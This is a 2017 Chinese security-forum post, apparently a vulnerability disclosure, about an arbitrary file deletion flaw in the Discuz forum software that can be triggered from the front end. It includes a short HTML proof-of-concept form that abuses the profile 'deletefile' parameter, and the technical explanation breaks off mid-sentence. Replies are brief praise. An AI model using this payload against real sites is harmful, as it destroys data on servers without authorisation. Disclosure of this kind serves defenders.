首页
社区
课程
招聘
[原创]dz前台可任意删除文件漏洞
发表于: 2017-10-10 20:13 6123

[原创]dz前台可任意删除文件漏洞

2017-10-10 20:13
6123

前提条件: 在根路径下创建favicon.ico此文件进行测试

post页面内容:

<html>

<form action="https://*/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">

<input type="file" name="birthprovince" id="file" />

<input type="text" name="profilesubmit"value="1"/></p>

<input type="submit" value="Submit" />

</form>

</html>

在上传时,调用home_spacecp.php,通过home_spacecp.php调用了


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 1
支持
分享
最新回复 (4)
雪    币: 341
活跃值: (143)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
2
厉害厉害
2017-10-11 11:09
0
雪    币: 2
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
厉害...............
2017-10-22 20:55
0
雪    币: 47
活跃值: (386)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
牛牛牛
2017-10-23 09:48
0
雪    币: 36
活跃值: (14)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
厉害!
2017-10-23 14:23
0
游客
登录 | 注册 方可回帖
返回
//